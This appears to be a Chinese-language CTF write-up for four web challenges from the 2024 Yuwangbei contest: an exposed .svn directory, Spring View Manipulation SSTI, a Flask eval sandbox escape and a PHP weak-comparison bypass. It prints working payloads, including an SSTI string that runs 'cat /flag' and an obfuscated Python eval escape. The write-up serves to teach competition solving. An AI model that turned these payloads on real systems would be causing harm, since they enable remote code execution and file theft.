当前位置: 首页 > news >正文

【Web】御网杯信息安全大赛2024 wp(全)

news 2025/6/30 0:21:55

目录

input_data 

admin

flask 

如此多的FLAG

一夜醒来之全国CTF水平提升1000倍😋

input_data 

访问./.svn后随便翻一翻拿到flag 

admin

dirsearch扫出来 

 

访问./error看出来是java框架

 

 测出来是/admin;/路由打Spring View Manipulation(Java)的SSTI

https://www.veracode.com/blog/secure-development/spring-view-manipulation-vulnerability

payload:

/admin;/?path=__%24%7Bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22cat /flag%22).getInputStream()).next()%7D__%3A%3A.x

 ​​​​​​​

flask 

题目附件

from flask import Flask, request, Response
import random
import reapp = Flask(__name__)@app.route('/')
def index():evalme = request.args.get('evalme')if ((not evalme) or re.search(r'[A-Zd-z\\. /*$#@!+^]', evalme)):return 'hacker?'with open(eval(evalme), 'rb') as f:return Response(f.read())if __name__ == '__main__':app.run(port=8080)

用这个

GitHub - Macr0phag3/parselmouth: 自动化的 Python 沙箱逃逸 payload bypass 框架 / Automated Python Sandbox Escape Payload Bypass Framework

python parselmouth.py --payload "'/flag'" --rule "__" "." "'" '"' "read" "chr" "\\" "/" "*" "$" "#" "@" "!" "+" "^" "A" "B" "C" "D" "E" "F" "G" "H" "I" "J" "K" "L" "M" "N" "O" "P" "Q" "R" "S" "T" "U" "V" "W" "X" "Y" "Z" "d" "e" "f" "g" "h" "i" "j" "k" "l" "m" "n" "o" "p" "q" "r" "s" "t" "u" "v" "w" "x" "y" "z"

 删去空格得到payload:

?evalme=𝒈𝒆𝒕a𝒕𝒕𝒓(𝒔𝒕𝒓(),𝒈𝒆𝒕a𝒕𝒕𝒓(𝒔𝒕𝒓(),𝒎a𝒙(𝒅𝒊c𝒕(𝒋𝒐𝒊𝒏=())))(𝒎a𝒑(𝒄𝒉𝒓,[106,111,105,110])))(𝒎a𝒑(𝒄𝒉𝒓,[47,102,108,97,103]))

如此多的FLAG

初始界面有提示

访问./F1aaj.php 

看cookie

 访问./FLLL4g.php

 

简单的php bypass,最后走一个eval代码注入变量覆盖弱比较 

 payload:

http://101.200.58.4:20005/FLLL4g.php?X[]=99999&Y=0e1284838308&Z=1;$f1ag=0
http://www.lryc.cn/news/447233.html

相关文章:

  • VC++同时处理ANSI和Unicode字符集,除了使用TCHAR和_T()宏外,还有其他方法可以实现吗?
  • MATLAB定位程序与讲解【专栏介绍】
  • 机器学习3--numpy
  • Linux之我不会
  • 音视频整体解码流程和同步流程
  • 1.2 HuggingFists安装说明-Linux安装
  • 四,MyBatis-Plus 当中的主键策略和分页插件的(详细实操使用)
  • Win32打开UWP应用
  • C# C++ 笔记
  • 关于最小二乘法
  • 国产OpenEuler与Centos全面之比较
  • Java面试题一
  • LabVIEW提高开发效率技巧----自动化测试和持续集成
  • 开源链动 2+1 模式 S2B2C 商城小程序:激活 KOC,开启商业新征程
  • 什么是Node.js?
  • 即插即用篇 | DenseNet卷土重来! YOLOv8 引入全新密集连接卷积网络 | ECCV 2024
  • 智能监控,守护绿色能源:EasyCVR在电站视频监控中心的一站式解决方案
  • 【BUG】静读天下|静读天下无法设置段间距解决方案
  • 希捷电脑硬盘好恢复数据吗?探讨可能性、方法以及注意事项
  • java通过webhook给飞书发送群消息
  • 每日一题——第一百零九题
  • 街头摊贩检测系统源码分享
  • 服务器数据恢复—SAN环境下LUN映射出错导致文件系统一致性出错的数据恢复案例
  • 深度学习:自然语言处理的基本原理
  • Win10 Chrome浏览器被强制绑定主页的解决办法
  • 【UE5】将2D切片图渲染为体积纹理,最终实现使用RT实时绘制体积纹理【第四篇-着色器投影-接收阴影部分】
  • Shell脚本基础——实训项目任务
  • Eclipse Memory Analyzer (MAT)提示No java virtual machine was found ...解决办法
  • 【C++篇】深度剖析C++ STL:玩转 list 容器,解锁高效编程的秘密武器
  • 植物大战僵尸杂交版V2.5.1下载(最新版)